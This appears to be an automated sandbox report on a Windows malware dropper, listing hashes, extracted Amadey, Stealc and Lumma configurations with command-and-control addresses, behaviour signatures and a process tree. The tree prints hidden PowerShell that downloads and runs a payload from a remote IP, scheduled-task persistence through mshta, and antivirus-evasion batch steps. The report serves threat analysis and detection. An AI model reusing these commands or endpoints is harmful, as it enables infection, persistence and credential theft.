Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/02/2025, 07:07

General

  • Target

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe

  • Size

    938KB

  • MD5

    d77cd6108c4916eb0cc768426b0bf4ad

  • SHA1

    54e3f788bd1d1a1087459170b0c0f24197565f72

  • SHA256

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f

  • SHA512

    22b81e6a3cbd5eae12e7e856b7c79432327978a53046d6099f4e3b957c6cbfe3264a1fcf073eb04beedcee6ff28b63ff60379429d32f1aaeafd1aee8ea63c5ea

  • SSDEEP

    24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8ayDFh:aTvC/MTQYxsWR7ayDX

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://cozyhomevpibes.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 8 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 13 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
    "C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn khqurma6aoa /tr "mshta C:\Users\Admin\AppData\Local\Temp\uUrFkJMFj.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn khqurma6aoa /tr "mshta C:\Users\Admin\AppData\Local\Temp\uUrFkJMFj.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2704
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\uUrFkJMFj.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GK41BESHU8OLGVCED7YZKHTKUZNGBV20.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Users\Admin\AppData\Local\TempGK41BESHU8OLGVCED7YZKHTKUZNGBV20.EXE
          "C:\Users\Admin\AppData\Local\TempGK41BESHU8OLGVCED7YZKHTKUZNGBV20.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3000
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1188
            • C:\Users\Admin\AppData\Local\Temp\1072419001\a71384ec3c.exe
              "C:\Users\Admin\AppData\Local\Temp\1072419001\a71384ec3c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Users\Admin\AppData\Local\Temp\H5NS25SGDWZX66ELX5CVL.exe
                "C:\Users\Admin\AppData\Local\Temp\H5NS25SGDWZX66ELX5CVL.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2500
              • C:\Users\Admin\AppData\Local\Temp\N4SM8X311HXEARZLEHMBYPDN.exe
                "C:\Users\Admin\AppData\Local\Temp\N4SM8X311HXEARZLEHMBYPDN.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1728
            • C:\Users\Admin\AppData\Local\Temp\1072420001\dc535b785a.exe
              "C:\Users\Admin\AppData\Local\Temp\1072420001\dc535b785a.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2620
            • C:\Users\Admin\AppData\Local\Temp\1072422001\8e827ee2a8.exe
              "C:\Users\Admin\AppData\Local\Temp\1072422001\8e827ee2a8.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2648
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn fgpQHma8mqv /tr "mshta C:\Users\Admin\AppData\Local\Temp\p3WAfJCLP.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn fgpQHma8mqv /tr "mshta C:\Users\Admin\AppData\Local\Temp\p3WAfJCLP.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1996
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\p3WAfJCLP.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1724
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2LBF573W18W0Y0ODTWXIJ4UPJCXZUPVD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1852
                  • C:\Users\Admin\AppData\Local\Temp2LBF573W18W0Y0ODTWXIJ4UPJCXZUPVD.EXE
                    "C:\Users\Admin\AppData\Local\Temp2LBF573W18W0Y0ODTWXIJ4UPJCXZUPVD.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2488
            • C:\Users\Admin\AppData\Local\Temp\1072423001\21d0e788a4.exe
              "C:\Users\Admin\AppData\Local\Temp\1072423001\21d0e788a4.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:784
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2972
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:376
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2344
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2008
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:568
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 764661
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1940
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Fm
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1744
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "Tunnel" Addresses
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2152
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2748
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2528
                • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
                  Macromedia.com F
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1740
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1616
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 15
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2844
            • C:\Users\Admin\AppData\Local\Temp\1072424001\8327ac9b4d.exe
              "C:\Users\Admin\AppData\Local\Temp\1072424001\8327ac9b4d.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1592
              • C:\Users\Admin\AppData\Local\Temp\1072424001\8327ac9b4d.exe
                "C:\Users\Admin\AppData\Local\Temp\1072424001\8327ac9b4d.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2332
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 516
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2472
            • C:\Users\Admin\AppData\Local\Temp\1072425001\aeece6caf6.exe
              "C:\Users\Admin\AppData\Local\Temp\1072425001\aeece6caf6.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1072419001\a71384ec3c.exe

    Filesize

    1.8MB

    MD5

    9346b93429053c65d01e751038dd2e2c

    SHA1

    80a8e46cd8a5852a2d2b6a571ee57f07e0c857a1

    SHA256

    ed2ae9ddaba8505e6018fc602dc44c7f7939c8c7b2e9435724366311c1c5f1ec

    SHA512

    7c466eb329a3091a1f3c99f5a75b31d86ebf7cff3e9bf350f6dbc083c89ec1e03ff5d3a4c35f84eda5bce7b92a1fe264b68645e7da745a3a34c2cea664ba766d

  • C:\Users\Admin\AppData\Local\Temp\1072420001\dc535b785a.exe

    Filesize

    1.7MB

    MD5

    c9e8be36f0289ca447fa3eb2133ccf0b

    SHA1

    9d95f0163bba1cf7c8c235d472d4ab5b4e474cc1

    SHA256

    66975c057f445eb8f25ddd1ab9e85a7e54f4cd1935d0fa05eeac29bdf3f738fe

    SHA512

    dabee729e8aa923946897f81e6edcbcdcbe30d6db9ed663785f77e9bb58fc2fe82f55df3a3ddaa9333e8e55751dee2ea9da0cbb01aa87f7846b1554cb15186af

  • C:\Users\Admin\AppData\Local\Temp\1072421001\bd1fdaf8b9.exe

    Filesize

    272KB

    MD5

    a13a0be631db83793a83e5a3e5dfc449

    SHA1

    f4fe78437cea3203b1b959219da46594cc2bae5b

    SHA256

    b384219d82f7d6f6aa7e4bb7d6271ff7c71c6b5ed44b336665ed84a4cd8da835

    SHA512

    cdb4d974b98e3ae7d199d022fae155ef7b7a5e35950635f028cb2611c97efec7ddfc6b8cf0b62d1eb9859441560f88a5ffe175014c935adc10b9e2f66a3702b7

  • C:\Users\Admin\AppData\Local\Temp\1072422001\8e827ee2a8.exe

    Filesize

    938KB

    MD5

    6c754df87e9a1e5faecbba27689cb744

    SHA1

    656c26aa41f80266ab50b07d29819c27e43f7fd4

    SHA256

    47ddaf78a3c3889401c03922541523403b1eca707a287588687f5d0535b25f30

    SHA512

    868d572f7e49f17f814fd3831441ba31331c74ebfd7c0783bd47fccdae78fde21fe80cbbdda762d0261877e600345a09985778a8fd636131289d3dfdcbc49e00

  • C:\Users\Admin\AppData\Local\Temp\1072423001\21d0e788a4.exe

    Filesize

    846KB

    MD5

    c3d89e95bfb66f5127ac1f2f3e1bd665

    SHA1

    bd79a4a17cc8ad63abdde20d9de02d55d54903f9

    SHA256

    5d07ad572a6a37d07d0b7ca990087960ad8850d7cfc56b8c7270c826c70fb56b

    SHA512

    d85116e24cf07f3063837fab1859ae6d9313dd269e28844900cbebe7521df8c65db97bc122bb097e9887d686bdf8f786b93a06208d762fded9035d2c6448a111

  • C:\Users\Admin\AppData\Local\Temp\1072424001\8327ac9b4d.exe

    Filesize

    795KB

    MD5

    e9ee9e540253f60d0f0f6efd140e524f

    SHA1

    e27ae23f783d062cb13e9c9e840f3790c6e43f61

    SHA256

    3ea9ea6d01e80568586120facc27bb2c31923d3bdcb9427cce6c458c6c6e3935

    SHA512

    7f637aad288c0e525f2761cf2590efe0e5cce69abb7af19809fb5798a93c67fa7ffc4bc8acc4070db3d21300cc109fef409b75f0f0fd52176dcefe115cb51c58

  • C:\Users\Admin\AppData\Local\Temp\1072425001\aeece6caf6.exe

    Filesize

    2.0MB

    MD5

    5295e9b37de57c4f9277e50f42d26540

    SHA1

    9097e68eb06b8e0b8cf798aa58666c9274beeae8

    SHA256

    a3a7f4389e2b1090538d1c793d030d9b9dd8e56588b49ae4b94cb20652917afa

    SHA512

    95dc4a59abe0d704f0dd1b7b2c663945f7badeffc3f11bf2ef1007f5e0178bccc7110e1b6893333c432b7760f6602f93d53f8dfbc4bab806ef2344f7566b67e8

  • C:\Users\Admin\AppData\Local\Temp\764661\F

    Filesize

    230KB

    MD5

    47840b8162b9c6e7fe90ab0603d61f93

    SHA1

    2bcfbadfa40e35f1ef64e4a048f2df2e03ffbb5a

    SHA256

    5e0f8bf19cc0e550fbc57f447e5b07597b9a2b04a71a4e67b10eb616f114d90b

    SHA512

    9cf08d2f0bc4987b199bd893d398950a71a3a4a0f568da94aef236a9928b0b07b6ea54dfae967e36c2c518a7c715a52d083c50ddcabe3a439c87e6153caddb00

  • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com

    Filesize

    758B

    MD5

    7a35f97ea68059a40497c814f2c10a5f

    SHA1

    279527870f42cea02ab3d90bcd174e8992d2163a

    SHA256

    097448d843adb271e655a648e16183d38d08293ce19aedcfaf017cebaecd6bd1

    SHA512

    21d6b7562245f3049f5752bec170186ee5d75eceab2a5f652c0eddb884802c30f1efa2d7b57931e772b42cc30697326636ecb41b5d6e2891e744094e203f40f5

  • C:\Users\Admin\AppData\Local\Temp\Addresses

    Filesize

    764B

    MD5

    41c199d56ee88613939ba36689b5272f

    SHA1

    c8ea27720461568200a6b1e65b26fcf34e0c40fa

    SHA256

    bc9e83d6b316359195dd0e515be2163998a0100587f2f8a2105352afc8ef48e4

    SHA512

    66511d865cdeb5039a660cd9551477c126d36eccaafa189c4c3dd97a31d4009a772e4138efc05ea0a840310c2f7b9a8ea1257432c310b706a06d9b052d306df2

  • C:\Users\Admin\AppData\Local\Temp\Baghdad

    Filesize

    122KB

    MD5

    db32131c3970c57d0ad200b8c586b9c8

    SHA1

    adb5d20e012b668ad6cc77c166ade302607795dc

    SHA256

    edd149ee8fc4e9ba7b0633b0b34bbc60f49fd4af949bbd06cdc46effcf9ec4a5

    SHA512

    d57b106d8cfee5459492e945cfd2d1c28727b5f8e1e48c7ec39f64d1f1c0856d7a898b2e6abe964abca2df610e4d6384c14696fe79d6da87c6ac52dbc85e4783

  • C:\Users\Admin\AppData\Local\Temp\Benz

    Filesize

    64KB

    MD5

    ec2a94df8c01a560e0604c640b26ccdd

    SHA1

    1ac09f3302b2df40302a050cee5ba5b119291215

    SHA256

    f0d88e80b23da7e59e76dd18d6b39737c577df9689ae49126ccafe5fbaeb5b5b

    SHA512

    bbe7b24db1451d425e3b241075ed6dc564d798fa504b3e0d75edf876e582599d1709836062fbc7d5175d85eb179b635db3c940a89c20863f9dcd739b0f8b44ec

  • C:\Users\Admin\AppData\Local\Temp\Complement

    Filesize

    59KB

    MD5

    dfb8e34f07291b05901c0d2a71e19442

    SHA1

    1b54535721482c0a3db1760541367a03deedc8c5

    SHA256

    0cb98ad246cd2531c12ec31fe31a0c5afbef269c9c913eb06de547d3730ddcc7

    SHA512

    09b5f13637608bcd1862b0d56af361c6acbe5f0100314fffe48a7f2266fb8d2bcc60ee9da5716ce20b73fefac9d6126f3488b12a44b2ac6f396f9051b5700379

  • C:\Users\Admin\AppData\Local\Temp\Deluxe

    Filesize

    131KB

    MD5

    7aa824f055dc532c3e713734d5733577

    SHA1

    d354d68335a862ab729ffae878b6f8a3cc774d97

    SHA256

    6812a48a86b7a9ca84cffe83f8678db2c495b09866fbe1a204f9bfe39854cd49

    SHA512

    e10d26b7d3156b9cda0d66cfbf31aaac7238e77d0fd0cd0c4e415f71867a0b3ca5254acbeda09109fb6f7bc2f92bb89682e52e7906af5ceb245db3c7a565e33c

  • C:\Users\Admin\AppData\Local\Temp\Derived

    Filesize

    30KB

    MD5

    f1548e92e0b2ffc07e003c7fae9ed9b9

    SHA1

    575ba8922ebbec527d150ec7c65992feace266db

    SHA256

    6b5b3edb8182fc38389ea991a97bc5bd798349e19aa9cacf413f415a3afbc0b5

    SHA512

    9f7dd7bedfe3ae8d4c8caebe241ca25a6f77d52c085b5aadc8ac5ea91ffdfe06c1c776854d2a953e11eed4437c1a851f6fa3388988e2220e57e23bbb7130b470

  • C:\Users\Admin\AppData\Local\Temp\Drunk

    Filesize

    109KB

    MD5

    e31afb9405514fd5b7ca3a02c5697de3

    SHA1

    d0c67c8ac6be3ba39586c2364a80d82ea07e9898

    SHA256

    d857088b8baa02a812fbeda516c74dc40907ddcd3e4d6a5be91b6c23042bd620

    SHA512

    0a6ba0aa91608b66fbc90857fd784a381619eb1781472b711f9c4123beec84e9ccbd269c062fd9071c1a0d5d5bbc694d700d562cba34076df6ed06b9ab146b88

  • C:\Users\Admin\AppData\Local\Temp\Fm

    Filesize

    478KB

    MD5

    d772c64b8f02e063f7f8b1cea9509574

    SHA1

    2aa72a8f3e6474e0d9d23cbf88b72cf60415a82b

    SHA256

    5c61934f8c63bd21694d648b69f70f426e8a462525c0ff6e4484464267961461

    SHA512

    6a497260969280d67c2ebbaddd24312e10fb4bfeecbc7f3f85d7ca6ca7c9afcbf1a2257f566a6cedf685abf9ec2c28ab7f643b173c52c6089578b7615d382c5c

  • C:\Users\Admin\AppData\Local\Temp\Glasses

    Filesize

    120KB

    MD5

    62ee0376f7b66f93856090027793c5ae

    SHA1

    358d6750df4765fea465451f1024892c132a8b5e

    SHA256

    312044d1badf072170a55deab7e126bcd766826ce201febc4a8dd74a7783f391

    SHA512

    74562de1769ffffdffc5518428bcdb5eadbd972f69ca37fa0971bf89f30ebaf41dacf2fe0b5373ffa0e1fe792f1bcb0aea0085ed0f94097cbfe5c23f3ee1edeb

  • C:\Users\Admin\AppData\Local\Temp\Hills

    Filesize

    31KB

    MD5

    56f234f3854b87f2da60d4370c80f4ef

    SHA1

    7196616a8c40ffd498de9fc18ef0b4182a410c5b

    SHA256

    e652ac7a40a3c797a190dc16d1741910d3785609289fef8379d488abec53ffc6

    SHA512

    a3ae351b9c35df7634ac622509a25bc2006f20b643c48efe521278ee6a1c40e69ee4c981bb9d53be783d203e3ddf87479846baeeaaabb026ed411ba3b7163176

  • C:\Users\Admin\AppData\Local\Temp\Pac

    Filesize

    87KB

    MD5

    44af3d9f2851fc9d3758542d4b83beb0

    SHA1

    00e5819a99f6bd7b8a91c56a20b4a04603ba1fdc

    SHA256

    6ec134b5a0eac1fac5216470cef1fd3a4d1a8d061d429030a9d12f7978aed5a9

    SHA512

    633b59dc281727cd5321b8135d0b5929bb0d37b7123913b777ddf2dbc7f5d3e71e4d7377750c97d4398596edb5b18f53d514356833613e5b0713bb0438a96e6f

  • C:\Users\Admin\AppData\Local\Temp\Plumbing

    Filesize

    62KB

    MD5

    d0a3f0692a9b5c96b6c1dfcb8192fdc6

    SHA1

    ca70a2d0ca34f6b06f4de3bd035e14183102a571

    SHA256

    bd20e251d01cf8ab324683f697faee6aa0dab7484609d5db9d5c98f84af49d72

    SHA512

    52290b8a0e714c0a5f03504e521c4e5511f53217985032db83a205b6b22baf18f5cfb23c353dc7aded90c43ff925ac8ef80b94bc086f7a8de4f93cbc13f94095

  • C:\Users\Admin\AppData\Local\Temp\Racing

    Filesize

    62KB

    MD5

    354d8dade537bd6b724e2c0385910994

    SHA1

    3fbfaf7a3806875311b74f8152d803a6385b6956

    SHA256

    ccb09907d574bb0f0e90db133039589205342f74d6410592841f1fb49b0b8678

    SHA512

    1a4869a55a65b2aa8f80e9284955ba66636da8dfbdb528d5b31b2ce469181403577708ed2c899c68c61ab9b9d33c140a8b8aa0c52ce94c375812a9e537527363

  • C:\Users\Admin\AppData\Local\Temp\Soundtrack

    Filesize

    78KB

    MD5

    43beeaedf4525e9ee2174012ee5ad60b

    SHA1

    67686a082061f90467fbd0536443175f5a2e77cc

    SHA256

    d672d30549406465eadc12703e91bf70014e81c60ef68d6b60f77b23c313e6b5

    SHA512

    9561e01bf0d52f2b32ccbff5c1bf74f97b414b6c89753c963d0302963534e3acbbc171670d0bd3d9fae0ea0b19de58cc04bda5b3864b7aff07dc3d1c85e4a5ac

  • C:\Users\Admin\AppData\Local\Temp\Tender

    Filesize

    70KB

    MD5

    6f2d9e28fc8288ba6a6858607da20564

    SHA1

    195eee4913f5a2d43ef717d7e4afed13f28c9ab9

    SHA256

    78e49500799a356e0ead812924ee64ba4a89031845df0c4b4d3a7c704d2ea84a

    SHA512

    fe930932d16863726ed3afd771d0a7d7ef0501ff5057325d0e7cb3466ded3783168736ef2b3c46774c7df09b441b82b455288b7eeb80c6ac39e0b64197d7cd95

  • C:\Users\Admin\AppData\Local\Temp\Totally

    Filesize

    50KB

    MD5

    c4af150b901a67bd95170ce3449b5c95

    SHA1

    95daab7704c8f186c963260596f274b0ae6f4fad

    SHA256

    53c65f7778006abe3ff0f8b696b80f22eea2f642313ef7c8b489aae884645852

    SHA512

    30078fdf0a5e69aa8df65f275ac26f75fb1ce548b231367cb7ef94cd1deddd3f5171dbe56f924c5c79c587f187f7563ffc482e6690b2e275bd823e231a66b42d

  • C:\Users\Admin\AppData\Local\Temp\Turner

    Filesize

    17KB

    MD5

    8302276f879565bfcf18de8278fa2df2

    SHA1

    5ade1c7516c3299b9a3572766a6512ef079f1aa1

    SHA256

    dd59aeaa649c3116f43228bf8da6614ae31d57e2da00777ab3b3e8dacd14258a

    SHA512

    515352faf704f9026bf22df113089d13ff0c9de6059efc28fef9d1371ca49618a55fa19c414a8493cf354e525b288bc342732d88aa3fe3143e3fea58107dbade

  • C:\Users\Admin\AppData\Local\Temp\York

    Filesize

    79KB

    MD5

    4bfd15f3a354c7a93533787429a3a645

    SHA1

    0a114c1d163c1417b97f21e21b48778b87fd9ad3

    SHA256

    31d5191e194b80b12101da35ab1a87a1d99db2ef2ee884855a02dedda29c5632

    SHA512

    333ac5f64e86f67a472bdcdcb69ce85fe670da874bc7f5c18398e390b5ecb767e945c3ab13e9ba7ad65ca4c7e367c3cdf99e52a478d3f9e1ac0f6bcd0decdca6

  • C:\Users\Admin\AppData\Local\Temp\p3WAfJCLP.hta

    Filesize

    720B

    MD5

    4175c3e5cdb756a545d077360006b292

    SHA1

    dbddf9f0e7e446f966ab08402299bea53434052c

    SHA256

    43a4bb52d04782b06ac505dd07d4dcd1458c9c15132603a7da7cd2b06978383c

    SHA512

    171c64e97a1bcff3635f075bc8e4381e8af0a362fc237259d423eed77d54922dc9408dcb7601bb50d5bc67aa5b6bdbcb09688d490c8603b6847a2230e3ae8e51

